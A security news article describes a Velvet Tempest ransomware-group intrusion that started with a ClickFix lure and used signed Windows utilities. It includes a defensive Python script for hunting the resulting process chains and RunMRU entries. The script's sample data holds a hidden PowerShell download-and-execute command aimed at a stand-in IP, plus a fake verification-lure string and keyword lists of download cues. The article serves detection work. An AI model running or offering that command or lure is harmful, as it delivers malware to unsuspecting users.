Ethical Hacking News
Researchers at MalBeacon have documented an intrusion by Velvet Tempest (DEV-0504), a ransomware threat group linked over the years to Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit and RansomHub. Initial access to a non-profit organization with over 3,000 endpoints and more than 2,500 users came through a ClickFix lure: the victim pasted an obfuscated command into the Windows Run dialog, which spawned nested cmd.exe chains that fetched the first loaders. PowerShell then downloaded and executed further stages, including csc.exe compilation, a Python-based persistence component, DonutLoader and the CastleRAT backdoor associated with the CastleLoader malware loader. The point for defenders is that nearly every stage ran through legitimate, signed Windows utilities rather than custom tooling, which is what made the activity hard to separate from normal administration.
Velvet Tempest, also tracked as DEV-0504 (Microsoft's earlier designation for the group), has been involved in a series of high-profile ransomware operations over the past few years. The latest incident, observed by researchers at the cyber-deception threat intelligence firm MalBeacon, combined a social engineering lure with living-off-the-land use of built-in Windows utilities to deploy malware.
In late February 2026, the researchers found that Velvet Tempest had gained initial access to a non-profit organization with over 3,000 endpoints and more than 2,500 users. A malicious advertising campaign led victims to a ClickFix lure, a fake verification or "fix it" prompt that instructs the user to paste an obfuscated command into the Windows Run dialog (Win+R). No exploit is involved: the user launches the first stage themselves. The pasted command spawned a series of nested cmd.exe processes, which ultimately fetched the first malware loaders.
Those loaders downloaded and executed additional payloads via PowerShell. This included compiling .NET components in temporary directories with csc.exe, which is the same behaviour PowerShell's Add-Type produces in legitimate scripts and therefore a noisy signal on its own, and dropping Python-based components under C:\ProgramData for persistence. The operation also deployed DonutLoader and retrieved the CastleRAT backdoor, a remote access trojan associated with the CastleLoader malware loader.
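The chain described above (explorer.exe spawning nested cmd.exe, then PowerShell with download-and-execute cues, then csc.exe in a Temp directory and a Python interpreter under C:\ProgramData) leaves a recognisable shape in process telemetry, and the pasted Run-dialog command is recorded in the user's RunMRU registry key. The following is an added detection example written for this article, not code from MalBeacon or the original page. The events and registry values are constructed Sysmon-style samples, the field names (pid, ppid, image, cmdline) are an assumption about the export format, and the IP address is an RFC 5737 documentation address, not an indicator from the intrusion.

```python
"""Hunt the ClickFix -> cmd.exe -> PowerShell chain in process telemetry.

Added example; constructed data only. Field names are assumed, not a real
Sysmon schema, and 198.51.100.7 is a documentation address (RFC 5737).
"""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE1 = 'powershell -w hidden -ep bypass -c "iex (iwr http://198.51.100.7/ld -UseBasicParsing)"'

# Constructed process-creation events (one dict per event), NOT real telemetry.
EVENTS = [
    {"pid": 100, "ppid": 4,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # ClickFix: the Run dialog hands the pasted text to cmd.exe, whose parent is explorer.exe
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c cmd /c " + STAGE1},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c " + STAGE1},
    {"pid": 300, "ppid": 201, "image": PS, "cmdline": STAGE1},
    # follow-on stages: csc.exe compiling out of %TEMP% (what Add-Type does) and Python under ProgramData
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\u\AppData\Local\Temp\abcd\abcd.cmdline"'},
    {"pid": 500, "ppid": 300, "image": r"C:\ProgramData\pyenv\python.exe",
     "cmdline": r"C:\ProgramData\pyenv\python.exe C:\ProgramData\pyenv\run.py"},
    # benign noise: a user shell running ipconfig, and a scheduled PowerShell script
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 601, "ppid": 600, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    {"pid": 700, "ppid": 50,  "image": PS, "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
]

# Download-and-execute cues typical of ClickFix first stages.
DOWNLOAD_CUES = re.compile(
    r"\b(iex|iwr|invoke-expression|invoke-webrequest|downloadstring|downloadfile|"
    r"net\.webclient|frombase64string|start-bitstransfer)\b|-enc", re.IGNORECASE)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
RUN_TOKENS = re.compile(r"\b(cmd|powershell|pwsh|mshta|wscript|cscript|curl|certutil)\b", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Return the process and its ancestors, child first, stopping at missing parents."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def find_clickfix_chains(events):
    """PowerShell with download cues, reached from explorer.exe through one or more cmd.exe."""
    hits = []
    for e in events:
        if basename(e["image"]) not in ("powershell.exe", "pwsh.exe") or not DOWNLOAD_CUES.search(e["cmdline"]):
            continue
        names = [basename(a["image"]) for a in ancestry(events, e["pid"])]
        depth = 0
        for n in names[1:]:                      # count the run of cmd.exe parents
            if n != "cmd.exe":
                break
            depth += 1
        if depth >= 1 and depth + 1 < len(names) and names[depth + 1] == "explorer.exe":
            hits.append({"pid": e["pid"], "cmd_depth": depth, "chain": " -> ".join(reversed(names))})
    return hits


def find_lolbin_followon(events):
    """Second-stage tells: csc.exe building from a Temp path, Python running out of C:\\ProgramData."""
    hits = []
    for e in events:
        img = basename(e["image"])
        if img == "csc.exe" and TEMP_RE.search(e["cmdline"]):
            hits.append((e["pid"], "csc.exe compiling from a Temp directory"))
        if img.startswith("python") and e["image"].lower().startswith("c:\\programdata\\"):
            hits.append((e["pid"], "python interpreter running from C:\\ProgramData"))
    return hits


# Constructed export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Windows stores each Run-dialog entry with a trailing "\1" and orders them via MRUList.
RUNMRU = {"MRUList": "cba", "a": "notepad\\1", "b": "\\\\fileserver\\share\\1",
          "c": "cmd /c cmd /c " + STAGE1 + "  # I am not a robot - Verification ID: 4821\\1"}


def decode_runmru(values):
    """Return Run-dialog history, most recent first, with the '\\1' marker stripped."""
    cmds = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds


def suspicious_runmru(values):
    return [c for c in decode_runmru(values) if RUN_TOKENS.search(c) or DOWNLOAD_CUES.search(c)]


if __name__ == "__main__":
    for h in find_clickfix_chains(EVENTS):
        print("ClickFix chain:", h)
    for pid, why in find_lolbin_followon(EVENTS):
        print("Follow-on:", pid, why)
    for c in suspicious_runmru(RUNMRU):
        print("RunMRU:", c)
```

The chain rule is the one worth alerting on; csc.exe in Temp and a ProgramData interpreter are weak alone (Add-Type and developer tooling produce both) and are best used to enrich a chain hit or a suspicious RunMRU entry rather than as stand-alone detections. RunMRU is per-user, so the pasted command survives in the victim's hive even after the processes are gone.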
The CastleLoader ecosystem that CastleRAT belongs to has been used to distribute multiple families of ransomware and information stealers. Routing each stage through pre-installed, signed Windows binaries (cmd.exe, PowerShell, csc.exe) lets Velvet Tempest slip past application allow-listing and signature-based controls, since nothing unusual is written to disk until late in the chain, and the individual process events look like ordinary administration.
Researchers noted that the deployment timeline included Active Directory reconnaissance, host discovery and environment profiling, carried out through hands-on-keyboard activity alongside a PowerShell script that harvested credentials stored in Chrome. Tooling was staged from an IP address previously linked to Termite ransomware intrusions, an overlap that gave the researchers a key link between this activity and that ransomware operation.
Velvet Tempest has been associated with deploying some of the most damaging ransomware strains of recent years: Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit and RansomHub. The group's tactics, techniques and procedures (TTPs) show a level of operational maturity that continues to challenge defenders.
The ClickFix technique relies entirely on social engineering: the victim pastes and runs the command, so no vulnerability needs to be exploited and browser or e-mail exploit protections are never engaged. Multiple ransomware actors have adopted it, which makes monitoring the resulting artifacts (explorer.exe spawning cmd.exe or PowerShell, and the per-user RunMRU history of the Run dialog) a worthwhile investment for defenders.
Notably, despite the Termite staging overlap, no ransomware was deployed in the observed intrusion. The incident still illustrates how readily these actors change access vectors and tooling, and why preparation has to cover a wide range of entry points rather than a single known playbook.
In conclusion, Velvet Tempest's reliance on legitimate utilities to deliver malware shows how far ransomware operators have moved toward living off the land. As these actors keep refining their tactics, defenders need to track emerging techniques such as ClickFix and tune detections toward process lineage and behaviour rather than file signatures alone.
Related Information:
https://www.ethicalhackingnews.com/articles/Ransomware-Threat-Actors-Utilize-Legitimate-Utilities-to-Deploy-Malware-The-Case-of-Velvet-Tempest-ehn.shtml
Published: Sat Mar 7 11:21:29 2026 by llama3.2 3B Q4_K_M